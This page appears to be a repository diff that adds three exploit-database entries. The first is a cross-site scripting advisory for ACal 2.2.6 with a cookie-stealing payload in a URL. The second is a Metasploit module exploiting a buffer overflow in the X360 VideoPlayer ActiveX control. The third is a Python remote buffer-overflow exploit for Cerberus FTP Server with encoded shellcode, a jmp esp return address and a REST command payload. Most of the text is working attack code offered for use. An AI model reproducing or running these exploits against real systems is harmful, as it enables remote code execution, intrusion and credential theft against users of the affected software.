source: http://www.securityfocus.com/bid/49442/info
|
||||
|
||||
ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
ACal 2.2.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>
|
143
platforms/windows/remote/36100.rb
Executable file
143
platforms/windows/remote/36100.rb
Executable file
|
@ -0,0 +1,143 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
|
||||
X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
|
||||
a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Rh0', # vulnerability discovery and exploit, all the hard work
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '35948'],
|
||||
['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'PrependEncoder' => stack_adjust
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
:ua_ver => '10.0'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jan 30 2015",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def stack_adjust
|
||||
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
|
||||
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
|
||||
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
|
||||
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
|
||||
|
||||
adjust
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /exploit.js/
|
||||
print_status("Sending exploit.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, exploit_template(cli, target_info), headers)
|
||||
when /sprayer.js/
|
||||
print_status("Sending sprayer.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, sprayer_template(cli, target_info), headers)
|
||||
when /informer.js/
|
||||
print_status("Sending informer.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, informer_template(cli, target_info), headers)
|
||||
when /rop_builder.js/
|
||||
print_status("Sending rop_builder.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
|
||||
else
|
||||
print_status("Sending main.html...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
|
||||
send_exploit_html(cli, main_template(cli, target_info), headers)
|
||||
end
|
||||
end
|
||||
|
||||
def main_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
|
||||
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def sprayer_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def informer_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def rop_builder_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def strip_comments(input)
|
||||
input.gsub(/\/\/.*$/, '')
|
||||
end
|
||||
|
||||
end
|
143
platforms/windows/remote/36111.py
Executable file
143
platforms/windows/remote/36111.py
Executable file
|
@ -0,0 +1,143 @@
|
|||
source: http://www.securityfocus.com/bid/49444/info
|
||||
|
||||
Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
|
||||
|
||||
Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
|
||||
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||
0 _ __ __ __ 1
|
||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||
1 \ \____/ >> Exploit database separated by exploit 0
|
||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||
1 1
|
||||
0 [+] Site : 1337day.com 0
|
||||
1 [+] Support e-mail : submit[at]1337day.com 1
|
||||
0 0
|
||||
1 ######################################### 1
|
||||
0 I'm KedAns-Dz member from Inj3ct0r Team 1
|
||||
1 ######################################### 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
|
||||
###
|
||||
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
|
||||
# Author : KedAns-Dz
|
||||
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
|
||||
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
|
||||
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
|
||||
# Facebook : http://facebook.com/KedAns
|
||||
# platform : windows
|
||||
# Impact : Remote Buffer Overflow ( in REST command)
|
||||
# Tested on : Windows XP SP3 (en)
|
||||
##
|
||||
|
||||
##
|
||||
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
|
||||
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
|
||||
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
|
||||
# | ------------------------------------------------- < |
|
||||
###
|
||||
|
||||
#=====[ Exploit Code ]======>
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
|
||||
# Provided by : KedAns-Dz * Inj3ct0r Team
|
||||
|
||||
import errno
|
||||
from os import strerror
|
||||
from socket import *
|
||||
import sys
|
||||
from time import sleep
|
||||
from struct import pack
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
|
||||
print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
ip = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
|
||||
# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
|
||||
shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48"
|
||||
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41"
|
||||
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58"
|
||||
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30"
|
||||
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
|
||||
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
|
||||
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b"
|
||||
"\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b"
|
||||
"\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c"
|
||||
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43"
|
||||
"\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49"
|
||||
"\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47"
|
||||
"\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a"
|
||||
"\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44"
|
||||
"\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47"
|
||||
"\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e"
|
||||
"\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45"
|
||||
"\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47"
|
||||
"\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f"
|
||||
"\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44"
|
||||
"\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45"
|
||||
"\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51"
|
||||
"\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42"
|
||||
"\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43"
|
||||
"\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45"
|
||||
"\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b"
|
||||
"\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a"
|
||||
"\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d"
|
||||
"\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c"
|
||||
"\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d"
|
||||
"\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d"
|
||||
"\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d"
|
||||
"\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45"
|
||||
"\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49"
|
||||
"\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51"
|
||||
"\x68\x43\x55\x45\x50\x41\x41")
|
||||
buf = "\x41" * 244
|
||||
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
|
||||
buf += "\x90" * 50
|
||||
buf += shellcode
|
||||
|
||||
print "[+]Connecting with server..."
|
||||
sleep(1)
|
||||
try:
|
||||
s = socket(AF_INET,SOCK_STREAM)
|
||||
s.connect((ip,port))
|
||||
s.recv(1024)
|
||||
s.send("USER test\r\n")
|
||||
s.recv(1024)
|
||||
s.send("PASS test\r\n")
|
||||
s.recv(1024)
|
||||
s.send("REST "+buf+"\r\n")
|
||||
s.close()
|
||||
s = socket(AF_INET,SOCK_STREAM)
|
||||
s.connect((ip,port))# Connected again to Crash and BOF
|
||||
sleep(1)
|
||||
s.close()# Close connection and Crash!!!
|
||||
print "[+]Exploit sent with sucess"
|
||||
except:
|
||||
print "[-]Error in connection with server: "+ip
|
||||
|
||||
#=====[ The End ]=======|
|
||||
|
||||
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
|
||||
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
|
||||
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
|
||||
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
|
||||
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
|
||||
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
|
||||
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
|
||||
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
|
||||
#=================================================
|
Loading…
Add table
Reference in a new issue